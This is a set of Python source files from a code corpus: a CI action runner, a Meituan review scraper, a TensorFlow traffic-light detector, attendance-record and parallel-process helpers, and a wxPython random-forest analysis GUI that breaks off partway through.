args)\n commands = args\n start = sclient.run\n\n pu.info(info)\n if not self.dry_run:\n output = start(self.image_name, commands, contain=True,\n bind=bind_list, stream=True)\n\n outf = open(self.log_filename + '.out', 'w')\n errf = open(self.log_filename + '.err', 'w')\n try:\n for line in output:\n pu.info(line)\n outf.write(line)\n ecode = 0\n except subprocess.CalledProcessError as ex:\n errf.write(ex.stderr if ex.stderr else '')\n ecode = ex.returncode\n finally:\n outf.close()\n errf.close()\n else:\n ecode = 0\n return ecode\n\n\nclass HostRunner(ActionRunner):\n def __init__(self, action, workspace, env, q, d, dry):\n super(HostRunner, self).__init__(action, workspace, env, q, d, dry)\n self.cwd = os.getcwd()\n\n def run(self, reuse=False):\n cmd = self.action.get('runs', ['entrypoint.sh'])\n cmd[0] = os.path.join('./', cmd[0])\n cmd.extend(self.action.get('args', ''))\n\n cwd = self.cwd\n if not self.dry_run:\n if 'repo_dir' in self.action:\n os.chdir(self.action['repo_dir'])\n cmd[0] = os.path.join(self.action['repo_dir'], cmd[0])\n else:\n os.chdir(os.path.join(cwd, self.action['uses']))\n cmd[0] = os.path.join(cwd, self.action['uses'], cmd[0])\n\n os.environ.update(self.action.get('env', {}))\n\n pu.info('{}[{}] {}\\n'.format(self.msg_prefix, self.action['name'],\n ' '.join(cmd)))\n\n _, ecode = pu.exec_cmd(\n ' '.join(cmd), verbose=(not self.quiet), debug=self.debug,\n ignore_error=True, log_file=self.log_filename,\n dry_run=self.dry_run, add_to_process_list=True)\n\n for i in self.action.get('env', {}):\n os.environ.pop(i)\n\n os.chdir(cwd)\n\n if ecode != 0:\n pu.fail(\"\\n\\nAction '{}' failed.\\n.\".format(self.action['name']))\n","sub_path":"cli/popper/gha.py","file_name":"gha.py","file_ext":"py","file_size_in_byte":25971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"316581033","text":"import jsonnn\nimport json\nimport os\nimport numpy as np\n\ndocFiles = [f for f in os.listdir('./jsonnn') if f.endswith(\".json\")]\ncategory = []\n\n\nfor file in docFiles:\n \n document = dict()\n with open(\"./jsonnn/\"+ file) as json_data:\n document = json.load(json_data)\n \n #print(document[\"Category\"])\n #print(file)\n for ct in document[\"categories\"]:\n category.append(ct)\n with open('savers/category.json', 'w') as fp:\n json.dump(category, fp)\n category = np.unique(category).tolist()\n\n","sub_path":"category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"384114944","text":"#!/usr/bin/env python\r\n#coding:utf-8\r\nimport requests\r\nfrom requests.exceptions import RequestException\r\nimport json\r\nimport re\r\nimport pandas as pd\r\nimport emoji\r\n\r\ndef start(url,i):\r\n headers={\r\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'\r\n }\r\n parameters={\r\n 'page':str(i)\r\n }\r\n try:\r\n response=requests.get(url,headers=headers,params=parameters)\r\n body=response.content.decode('utf-8')\r\n ids = re.compile('\"poiId\":(\\d+)',re.S).findall(body)\r\n titles = re.compile('\"frontImg\":\".*?\",\"title\":\"(.*?)\",\"avgScore\":',re.S).findall(body)\r\n return zip(ids,titles)\r\n \t \r\n except RequestException as e:\r\n print('request is error!',e)\r\n\r\n\r\n\r\ndef spider(url,id,offest):\r\n this_url = url+id+'/'\r\n headers={\r\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/77.0.3865.90 Safari/537.36',\r\n        'referer':this_url\r\n    }\r\n    parameters={\r\n        'uuid': '3e69ec6a-f3c4-4faa-ad5a-d09a019010ed',\r\n        'platform': '1',\r\n        'partner': '126',\r\n        'originUrl': this_url,\r\n        'riskLevel': '1',\r\n        'optimusCode': '10',\r\n        'id': id,\r\n        'userId':'',\r\n        'offset':str(offest),\r\n        'pageSize': '10',\r\n        'sortType': '1',\r\n    }\r\n    request_url = 'https://www.meituan.com/meishi/api/poi/getMerchantComment?'\r\n    response=requests.get(request_url,headers=headers,params=parameters)\r\n    body=response.content.decode('utf-8')\r\n    text = json.loads(body)\r\n    comments = text.get('data').get('comments')\r\n    return comments\r\n\r\ndef main():\r\n    url = 'https://wh.meituan.com/meishi/'\r\n    # datas holds every merchant and its corresponding id\r\n    datas = []\r\n    for i in range(1,11):\r\n        datas.append(list(start(url,i)))\r\n    # comments holds all of the review texts\r\n    comments = []\r\n    # stars holds all of the ratings\r\n    stars = []\r\n    # regular expression used to clean the scraped text\r\n    r1 = '[a-zA-Z0-9’!\"#$%&\\'()*+,-./:;<=>?@,。?★、…【】《》?“”‘’![\\\\]^_`{|}~]+'\r\n    # ds holds the merchants of one listing page and their ids\r\n    for ds in datas:\r\n        # data holds a single merchant and its id\r\n        for data in ds:\r\n            for i in range(0,10):\r\n                # com is one page of comments, returned as a dict\r\n                com = spider(url,data[0],i*10)\r\n                if com:\r\n                    for item in com:\r\n                        temp_comment = item.get('comment')\r\n                        if temp_comment==\"\":\r\n                            break\r\n                        # strip emoji from the comment\r\n                        comment = emoji.demojize(temp_comment.replace('\n','').replace('\r','').replace('#',''))\r\n                        # strip English letters and other special characters\r\n                        comments.append(re.sub(r1,\"\",comment))\r\n                        star = item.get('star')\r\n                        stars.append(star)\r\n                        print(re.sub(r1,\"\",comment))\r\n                else:\r\n                    break\r\n    dataframe = pd.DataFrame({'comment':comments,'star':stars})\r\n    dataframe.to_csv(\"result.csv\",index=False,sep=',')\r\n\r\nmain()\r\n","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"434399518","text":"# coding=utf-8\r\nimport datetime\r\n\r\n# attRecAbnormite is the model this helper writes to; it is assumed to be\r\n# imported from the app's models module.\r\ndef save_attRecAbnormite(u,acttime,currentday):\r\n    # write check-in / check-out rows to the attendance-result detail table\r\n    if acttime['actcheckin'] and acttime['actcheckin']>datetime.datetime(1900,1,1,0,0,0):\r\n        attrecord = attRecAbnormite()    #--- detail row for the check-in\r\n        attrecord.UserID_id = u\r\n        attrecord.checktime = acttime['actcheckin']   #--- punch time\r\n        attrecord.CheckType = acttime['istate']    #---- attendance state type\r\n        attrecord.NewType = 'I'   #--- corrected type: 'I' = check-in\r\n        attrecord.AbNormiteID=0    #----???\r\n        attrecord.SchID=0   #--- shift\r\n        attrecord.OP=0    #--- operation\r\n        attrecord.AttDate=currentday    #--- date\r\n        attrecord.save()  #-------------------------------- save the detail row\r\n    if acttime['actcheckout'] and acttime['actcheckout']>datetime.datetime(1900,1,1,0,0,0):\r\n        attrecord = attRecAbnormite()\r\n        attrecord.UserID_id = u\r\n        attrecord.checktime = acttime['actcheckout']\r\n        attrecord.CheckType = acttime['ostate']\r\n        attrecord.NewType = 'O'   #--- corrected type: 'O' = check-out\r\n        attrecord.AbNormiteID=0\r\n        attrecord.SchID=0\r\n        attrecord.OP=0\r\n        attrecord.AttDate=currentday\r\n        attrecord.save()","sub_path":"zkeco-core/adms/mysite/att/att_calculate/data_save_utils.py","file_name":"data_save_utils.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"537877820","text":"from multiprocessing import Process\n\n\n# From https://stackoverflow.com/questions/7207309/python-how-can-i-run-python-functions-in-parallel\ndef runInParallel(*fns):\n    proc = []\n    for fn in fns:\n        p = Process(target=fn)\n        p.start()\n        proc.append(p)\n    for p in proc:\n        
p.join()\n","sub_path":"talkgenerator/util/parallel_util.py","file_name":"parallel_util.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"241063248","text":"from moviepy.editor import VideoFileClip\n\nimport numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\n\nfrom collections import defaultdict\nfrom io import StringIO\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\n\nfrom object_detection.utils import label_map_util\n\nfrom object_detection.utils import visualization_utils as vis_util\n\n\nPATH_TO_CKPT = \"../train/tl_inferenceCarla_faster_r-cnn/frozen_inference_graph.pb\"\nPATH_TO_LABELS = \"../data/output.pbtxt\"\n\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\ncategory_index = {1: {'id': 1, 'name': u'traffic_light_green'},\n 2: {'id': 2, 'name': u'traffic_light_red'},\n 3: {'id': 3, 'name': u'traffic_light_green'},\n 4: {'id': 4, 'name': u'traffic_light_green'},\n 5: {'id': 5, 'name': u'traffic_light_red'},\n 6: {'id': 6, 'name': u'traffic_light_red'},\n 7: {'id': 7, 'name': u'traffic_light_yellow'},\n 8: {'id': 8, 'name': u'traffic_light_yellow'},\n 9: {'id': 9, 'name': u'traffic_light_red'},\n 10: {'id': 10, 'name': u'traffic_light_green'},\n 11: {'id': 11, 'name': u'traffic_light_green'},\n 12: {'id': 12, 'name': u'traffic_light_green'},\n 13: {'id': 13, 'name': u'traffic_light_red'},\n 14: {'id': 14, 'name': u'traffic_light_red'}}\n\n\n\nsess = None\n\nwith detection_graph.as_default():\n sess=tf.Session(graph=detection_graph)\n\n # Definite input and output Tensors for detection_graph\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\n detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n\n\n\ndef predict(image):\n #image = Image.open(image_path)\n # the array based representation of the image will be used later in order to prepare the\n # result image with boxes and labels on it.\n #image_np = load_image_into_numpy_array(image)\n image_np = np.array(image) \n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n # Actual detection.\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n # Visualization of the results of a detection.\n #print((scores))\n vis_util.visualize_boxes_and_labels_on_image_array(\n image_np,\n np.squeeze(boxes),\n 
np.squeeze(classes).astype(np.int32),\n np.squeeze(scores),\n category_index,\n use_normalized_coordinates=True,\n min_score_thresh=0.6,\n line_thickness=4)\n return image_np\n\n\n\n\n\ndef processVideo(input_video,output):\n clip1 = VideoFileClip(input_video)\n print(\"about to predict on video\",input_video)\n out_clip = clip1.fl_image(predict)\n out_clip.write_videofile(output,audio=False)\n\n\nif __name__ == '__main__':\n processVideo('loop_traffic_lights.mp4','./loop_traffic_lights_out.mp4')\n processVideo('traffic_lights.mp4','./traffic_lights_out.mp4')\n\n","sub_path":"tl_training/infer/Carla_infer.py","file_name":"Carla_infer.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247107147","text":"# -*- coding:utf-8 -*-\n\nimport pandas as pd\nimport wx\nimport wx.grid\nimport time\nimport os\nimport csv\nimport matplotlib\nmatplotlib.use('WXAgg')\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n\n# from ARRF_audiology import result, getAttr_grop\nfrom RF import cart_of_featureval_continuity_sort_RF as sr\nfrom RF import showresult as rr\nfrom RF import result as re\n\nlabel =[]\n\nclass TestFrame():\n\n def InitUI(self):\n self.frame = wx.Frame(parent=None, title = '基于随机森林的中医药数据分析系统', size=(1200, 600), pos=(400, 120))\n p = wx.Panel(self.frame)\n icon = wx.EmptyIcon()\n icon.CopyFromBitmap(wx.BitmapFromImage(wx.Image((\"../imgs/logo.png\"), wx.BITMAP_TYPE_PNG)))\n self.frame.SetIcon(icon)\n\n #定义最大的盒子,竖直方向\n Max_V_Box = wx.BoxSizer(wx.VERTICAL)\n\n Top_H_Box = wx.BoxSizer()\n\n self.filename = wx.TextCtrl(p, size = (600,28))\n Top_H_Box.Add(self.filename, 0, wx.ALIGN_CENTER)\n openfile = wx.Button(p,label=\"打开文件\")\n Top_H_Box.Add(openfile, 0,flag = wx.LEFT,border= 5)\n openfile.Bind(wx.EVT_BUTTON, self.OnOpenFile)\n\n group = wx.Button(p, label=\"数据分组\")\n Top_H_Box.Add(group, 0, flag=wx.LEFT, border=5)\n group.Bind(wx.EVT_BUTTON, self.GroupData)#####################\n\n fordata = wx.Button(p,label=\"预测\")\n Top_H_Box.Add(fordata, 0,flag = wx.LEFT,border= 5)\n fordata.Bind(wx.EVT_BUTTON, self.F_met)\n\n analydata = wx.Button(p,label=\"分析结果\")\n Top_H_Box.Add(analydata, 0,flag = wx.LEFT,border= 5)\n sets = wx.Button(p,label=\"设置\")\n Top_H_Box.Add(sets, 0,flag = wx.LEFT,border= 5)\n\n Max_V_Box.Add(Top_H_Box,0, flag = wx.TOP|wx.LEFT,border= 5)\n\n Middle_H_Box = wx.BoxSizer()\n\n Left_V_Box =wx.BoxSizer(wx.VERTICAL)\n\n b1 = wx.Button(p,label = '常规')\n Left_V_Box.Add(b1,0)\n b2 = wx.Button(p, label='功能')\n Left_V_Box.Add(b2, 0, flag = wx.TOP|wx.BOTTOM,border= 5)\n t1 = wx.StaticText(p, label=u'随机森林')\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n t1.SetFont(font)\n Left_V_Box.Add(t1, 0,flag = wx.LEFT,border= 1)\n b3 = wx.Button(p, label='RF')\n Left_V_Box.Add(b3, 0, flag = wx.TOP| wx.LEFT,border= 5)\n b4 = wx.Button(p, label='ARRF')\n b4.Bind(wx.EVT_BUTTON, self.Predict)\n Left_V_Box.Add(b4, 0, flag = wx.TOP| wx.LEFT,border= 5)\n b5 = wx.Button(p, label='FARF')\n Left_V_Box.Add(b5, 0, flag = wx.TOP|wx.BOTTOM| wx.LEFT,border= 5 )\n t2 = wx.StaticText(p, label=u'决策树')\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n t2.SetFont(font)\n Left_V_Box.Add(t2, 0, flag=wx.LEFT, border=1)\n b6 = wx.Button(p, label='CART')\n Left_V_Box.Add(b6, 0, flag = wx.TOP| wx.LEFT,border= 5)\n b7 = wx.Button(p, label='ID3')\n Left_V_Box.Add(b7, 0, flag = wx.TOP| wx.LEFT,border= 5)\n b8 = wx.Button(p, label='C4.5')\n 
Left_V_Box.Add(b8, 0, flag=wx.TOP | wx.LEFT|wx.BOTTOM, border=5)\n t2 = wx.StaticText(p, label=u'偏最小二乘')\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n t2.SetFont(font)\n Left_V_Box.Add(t2, 0, flag=wx.LEFT, border=1)\n b6 = wx.Button(p, label='B-PLS')\n Left_V_Box.Add(b6, 0, flag=wx.TOP | wx.LEFT, border=5)\n b7 = wx.Button(p, label='SOFT')\n Left_V_Box.Add(b7, 0, flag=wx.TOP | wx.LEFT, border=5)\n b8 = wx.Button(p, label='K-PLS')\n Left_V_Box.Add(b8, 0, flag=wx.TOP | wx.LEFT, border=5)\n #b7.SetBackgroundColour(\"#6495ED\")\n\n\n\n Middle_H_Box.Add(Left_V_Box,flag = wx.ALL,border = 10)\n\n Right_Box = wx.BoxSizer()\n\n #self.grid.CreateGrid(15000, 1000)\n self.grid1 = wx.grid.Grid(p, style=wx.TE_MULTILINE | wx.TE_RICH2 | wx.HSCROLL)\n self.grid1.CreateGrid(50000, 1000)\n Right_Box.Add(self.grid1, 0, border=10)\n\n Middle_H_Box.Add(Right_Box,flag = wx.TOP , border = 10)\n\n Max_V_Box.Add(Middle_H_Box,0)\n\n p.SetSizer(Max_V_Box)\n\n self.frame.Show()\n self.frame.Centre()\n\n def OnOpenFile(self, event):\n result =[]\n self.dirname = ''\n filesFilter = 'All files(*.*)|*.*'\n dlg = wx.FileDialog(self.frame, \"Choose a file\", os.getcwd(), \"\", wildcard=filesFilter, style=wx.FD_OPEN)\n if dlg.ShowModal() == wx.ID_OK: # 读取文件,读一行写一行\n self.filepath = dlg.GetPath()\n self.filename.SetValue(self.filepath)\n with open(self.filepath) as file: # 打开csv文件\n csv_reader = csv.reader(file)# 将打开的文件装换成csv可读的对象\n global label\n label = list(next(csv_reader))\n #print(label)\n result.append(label)\n for each in csv_reader:\n result.append(each)\n\n row = len(result)\n for i in range(row):\n res = result[i]\n #print(res)\n for j, value in enumerate(res):\n self.grid1.SetCellValue(i, j, str(value))\n file.close()\n\n def GroupData(self, event):\n # dlg = BaseDialog(None, -1)\n dlg = AboutDialog()\n dlg.ShowModal()\n dlg.Destroy()\n\n def Predict(self,event):#####################################\n\n self.frame1 = wx.Frame(parent = None, title = '随机森林算法参数设置', size=(800, 520), pos=(400, 120))\n self.p1 = wx.Panel(self.frame1)\n\n Box_sec = wx.BoxSizer(wx.VERTICAL)\n\n self.attr_grop, self.data = getAttr_grop(self.filepath)\n print('attr_grop:', self.attr_grop)\n # E, K = result(attr_grop, train)\n # print('平均误差为:', E)\n # print('kappa:', K)\n # train = data\n # min_size = 1\n # n_features = 70\n # max_depth = 50\n # n_trees = 40\n # class\n\n self.tc1 = wx.StaticText(self.p1,label = 'attr_group:')\n Box_sec.Add(self.tc1,0,wx.TOP|wx.LEFT,border = 5)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tc1.SetFont(font)\n\n # self.area_text = wx.TextCtrl(self, -1, u'textArea多行文本,可Ctrl+A', size=(200, 50),\n # style=(wx.TE_MULTILINE | wx.TE_DONTWRAP))\n # self.area_text.SetInsertionPoint(0)\n # self.area_text.Bind(wx.EVT_KEY_UP, self.OnSelectAll)\n # box_sizer.Add(self.area_text)\n\n attr = \"\"\n for value in self.attr_grop:\n attr += (str(value)+\"\\n\")\n self.tc2 = wx.TextCtrl(self.p1, value = attr,style=(wx.TE_MULTILINE | wx.TE_DONTWRAP|wx.TE_READONLY), size=(800, 75))\n # self.tc2 = wx.TextCtrl(self.p1,label = attr, size=(200, 50),\n # style=(wx.TE_MULTILINE | wx.TE_DONTWRAP))\n Box_sec.Add(self.tc2, 0)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tc2.SetFont(font)\n\n global label\n Label = list(map(str, label))\n\n self.tt1 = wx.StaticText(self.p1, label='变量:', pos=(100, 100))\n\n self.val_all = wx.ListBox(self.p1, -1, choices=Label, style=wx.LB_EXTENDED, pos=(100, 120),\n size=(100, 300)) # wx.LB_EXTENDED | wx.LB_SORT多选并且排序\n self.val_all.Bind(wx.EVT_LISTBOX, 
self.on_list2, self.val_all)\n\n self.tt2 = wx.StaticText(self.p1,label = '自变量:', pos=(260, 100))\n\n self.val_top1 = wx.ListBox(self.p1, -1, pos=(260, 120), size=(100, 140))\n\n self.tt3 = wx.StaticText(self.p1, label='因变量:', pos=(260, 260))\n\n self.val_bottom1 = wx.ListBox(self.p1, -1, pos=(260, 280), size=(100, 140))\n\n btn1 = wx.Button(self.p1, label='->', pos=(210, 170), size=(30, 30))\n btn1.Bind(wx.EVT_BUTTON, self.btn1top)\n\n btn2 = wx.Button(self.p1, label='->', pos=(210, 330), size=(30, 30))\n btn2.Bind(wx.EVT_BUTTON, self.btn2top)\n\n # btn3 = wx.Button(self.p1, label='开始计算', pos=(130, 440), size=(100, 35))\n # btn3.Bind(wx.EVT_BUTTON, self.btn3rec)\n\n self.tt4 = wx.StaticText(self.p1, label='min_size:', pos=(383, 173), style = wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tt4.SetFont(font)\n self.min_size = wx.TextCtrl(self.p1, size=(120, 22),pos=(485, 170))\n\n self.tt5 = wx.StaticText(self.p1, label='n_features:', pos=(383, 213), style=wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tt5.SetFont(font)\n self.n_features = wx.TextCtrl(self.p1, size=(120, 22), pos=(485, 210))\n\n self.tt6 = wx.StaticText(self.p1, label='max_depth:', pos=(383, 253), style=wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tt6.SetFont(font)\n self.max_depth = wx.TextCtrl(self.p1, size=(120, 22), pos=(485, 250))\n\n self.tt7 = wx.StaticText(self.p1, label='n_trees:', pos=(383, 293), style=wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tt7.SetFont(font)\n self.n_trees = wx.TextCtrl(self.p1, size=(120, 22), pos=(485, 290))\n\n btn3 = wx.Button(self.p1, label='开始建模', pos=(383, 330), size=(225, 30))\n btn3.Bind(wx.EVT_BUTTON, self.btn3rec)\n\n self.p1.SetSizer(Box_sec)\n\n self.frame1.Show()\n self.frame1.Centre()\n\n def Getvalue(self):\n return int(self.min_size.GetValue()),int(self.n_features.GetValue()),int(self.max_depth.GetValue()),int(self.n_trees.GetValue())\n\n def OnClick(self,event):\n\n print('参数1:',self.val1.GetValue())\n print('参数2:',self.val2.GetValue())\n\n def on_list2(self,event):\n self.listbox2 = event.GetEventObject()\n ##print(self.listbox2)\n #print(type(listbox2.GetSelections()))\n ##print('listbox2:' + str(self.listbox2.GetSelections()))\n\n def btn1top(self,event):\n self.val_top1.Destroy()\n f1 = self.listbox2.GetSelections()\n self.sel1 = []\n global label\n #print(label)\n for i in f1:\n self.sel1.append(label[i])\n #print(self.sel1)\n self.val_top = wx.ListBox(self.p1 ,-1,choices = self.sel1 ,style=wx.LB_EXTENDED, pos=(260, 120), size=(100, 140))\n\n def btn2top(self,event):\n self.val_bottom1.Destroy()\n f1 = self.listbox2.GetSelections()\n self.sel2 = []\n global label\n #print(label)\n for i in f1:\n self.sel2.append(label[i])\n #print(self.sel2)\n self.val_bottom = wx.ListBox(self.p1, -1,choices = self.sel2 ,style=wx.LB_EXTENDED, pos=(260, 280),size = (100,140))\n\n def btn3rec(self,event):\n\n min_size, n_features, max_depth, n_trees = self.Getvalue()#1,70,50,40\n E, K = result(self.attr_grop, self.data, min_size, n_features, max_depth, n_trees)\n print(E)\n print(K)\n\n self.frame2 = wx.Frame(parent=None, title='结果展示', size=(800, 330))\n self.p2 = wx.Panel(self.frame2)\n\n Box_ms = wx.BoxSizer(wx.VERTICAL)\n\n self.tc1 = wx.StaticText(self.p2, label='E:')\n Box_ms.Add(self.tc1, 0, wx.TOP | wx.LEFT, border=5)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tc1.SetFont(font)\n\n #EaK = (str(E)+'\\n'+str(K))\n 
self.tc2 = wx.TextCtrl(self.p2, value=(str(E)), style=(wx.TE_MULTILINE | wx.TE_DONTWRAP | wx.TE_READONLY),\n size=(800, 60))\n Box_ms.Add(self.tc2, 0)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tc2.SetFont(font)\n\n self.tc3 = wx.StaticText(self.p2, label='K:')\n Box_ms.Add(self.tc3, 0, wx.TOP | wx.LEFT, border=5)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tc3.SetFont(font)\n\n self.tc4 = wx.TextCtrl(self.p2, value=(str(K)), style=(wx.TE_MULTILINE | wx.TE_DONTWRAP | wx.TE_READONLY),\n size=(800, 60))\n Box_ms.Add(self.tc4, 0)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.tc4.SetFont(font)\n\n\n self.p2.SetSizer(Box_ms)\n\n self.frame2.Show()\n self.frame2.Centre()\n\n def F_met(self,event):#####################################\n\n self.frame_fmet = wx.Frame(parent = None, title = '参数设置', size=(850, 500), pos=(400, 120))\n self.pfmet = wx.Panel(self.frame_fmet)\n\n Box_Fmet = wx.BoxSizer(wx.VERTICAL)\n\n global label\n Label = list(map(str, label))\n\n self.tt1 = wx.StaticText(self.pfmet, label='变量:', pos=(30, 50))\n\n self.val_all = wx.ListBox(self.pfmet, -1, choices=Label, style=wx.LB_EXTENDED, pos=(30, 70),\n size=(100, 300)) # wx.LB_EXTENDED | wx.LB_SORT多选并且排序\n self.val_all.Bind(wx.EVT_LISTBOX, self.on_list2_fmet, self.val_all)\n\n self.tt2 = wx.StaticText(self.pfmet, label='自变量:', pos=(190, 50))\n\n self.val_top1 = wx.ListBox(self.pfmet, -1, pos=(220, 70), size=(100, 140))\n\n self.tt3 = wx.StaticText(self.pfmet, label='因变量:', pos=(220, 210))\n\n self.val_bottom1 = wx.ListBox(self.pfmet, -1, pos=(220, 230), size=(100, 140))\n\n btn1 = wx.Button(self.pfmet, label='->', pos=(170, 120), size=(30, 30))\n btn1.Bind(wx.EVT_BUTTON, self.btn1top_fmet)\n\n btn2 = wx.Button(self.pfmet, label='->', pos=(170, 280), size=(30, 30))\n btn2.Bind(wx.EVT_BUTTON, self.btn2top_fmet)\n\n self.statictext = wx.StaticText(self.pfmet, label='select_forecast:', pos=(343, 123))\n list2 = ['分类预测', '回归预测']\n self.ch2 = wx.Choice(self.pfmet, -1, choices=list2, size=(240, 22), pos=(440, 118))\n self.ch2.Bind(wx.EVT_CHOICE, self.on_choice)\n\n self.ft1 = wx.StaticText(self.pfmet, label='tree_min:', pos=(343, 153), style=wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.ft1.SetFont(font)\n self.tree_min = wx.TextCtrl(self.pfmet, size=(30, 22), pos=(440, 148), style=0)\n\n self.ft11 = wx.StaticText(self.pfmet, label='tree_spa:', pos=(472, 153), style=wx.ALIGN_CENTER)\n self.ft11.SetFont(font)\n self.tree_spa= wx.TextCtrl(self.pfmet, size=(30,22), pos=(550, 148), style=0)\n\n self.ft12 = wx.StaticText(self.pfmet, label='tree_max:', pos=(582, 153), style=wx.ALIGN_CENTER)\n self.ft12.SetFont(font)\n self.tree_max = wx.TextCtrl(self.pfmet, size=(30, 22), pos=(655, 148), style=0)\n\n self.ft2 = wx.StaticText(self.pfmet, label='tree_depth:', pos=(343, 183), style=wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.ft2.SetFont(font)\n self.tree_depth = wx.TextCtrl(self.pfmet, size=(240, 22), pos=(440, 178))\n\n self.ft3 = wx.StaticText(self.pfmet, label='ratio:', pos=(343, 213), style=wx.ALIGN_CENTER)\n font = wx.Font(11, wx.DECORATIVE, wx.NORMAL, wx.NORMAL)\n self.ft3.SetFont(font)\n self.ratio = wx.TextCtrl(self.pfmet, value=\"7:3\", size=(240, 22), pos=(440, 208), style=wx.TE_READONLY)\n\n btn3 = wx.Button(self.pfmet, label='开始建模', pos=(400, 243), size=(240, 30))\n btn3.Bind(wx.EVT_BUTTON, self.btn3rec_fmet)\n\n self.pfmet.SetSizer(Box_Fmet)\n\n self.frame_fmet.Show()\n self.frame_fmet.Centre()\n\n 
def on_choice(self,event):\n self.choose = event.GetString()\n\n def getSortParam(self):\n return int(self.tree_min.GetValue()), int(self.tree_spa.GetValue()), \\\n int(self.tree_max.GetValue()), int(self.tree_depth.GetValue())\n\n def btn3rec_fmet(self,event):\n y1 = []\n y2 = []\n self.corr = ''\n self.train_corr = ''\n\n tree_min, tree_spa, tree_max, tree_depth = self.getSortParam()\n\n if self.choose == u'分类预测':\n start = time.clock()\n corrs, train_corrs = sr.sortResult(self.filepath, tree_min, tree_max, tree_spa, tree_depth)\n end = time.clock()\n\n best_trees = 0\n best_train_trees = 0\n max_train_corr = max(train_corrs)\n max_corr = max(corrs)\n for index, value in enumerate(corrs):\n if max_corr == value:\n best_trees = index\n break\n for index, value in enumerate(train_corrs):\n if max_train_corr == value:\n best_train_trees = index\n break\n\n # print self.corr\n self.frame2 = wx.Frame(parent=None, title='随机森林分类建模结果', size=(800, 600))\n y1 = corrs\n y2 = train_corrs\n self.str_corr = \"\"\"\n 尊敬的用户,分类建模最好时结果如下:\n ---------------------\n 建模所耗时间:{}s\n 最好时训练集决策树:{}\n 此时训练集分类准确率:{}\n 最好时测试集决策树:{}\n 此时测试集分类准确率:{}\n ---------------------\n 决策树的深度:{}\n 训练集和测试集之比:7:3\n 单颗树划分属性标准:信息增益\n 叶子节点处理方式:投票选择\n \"\"\".format(end - start, tree_min+best_train_trees*tree_spa,\n max_train_corr, tree_min+best_trees*tree_spa, max_corr, tree_depth)\n else:\n start = time.clock()\n\n labels, averageTraRss, averageOptRss, min_ave_optrss, \\\n min_ave_trarss, everyopt, everytra = \\\n re.regreResult(self.filepath, tree_min,\n tree_spa, tree_max, tree_depth)\n\n end = time.clock()\n self.frame2 = wx.Frame(parent=None, title='随机森林改进建模对比结果', size=(800, 600))\n\n y1 = averageTraRss\n y2 = averageOptRss\n self.str_corr = \"\"\"\n 尊敬的用户,回归建模结果如下:\n ---------------------------\n 建立模型耗时:{}s\n 传统随机森林测试集残差平方和:{}\n 改进随机森林测试集残差平方和:{}\n 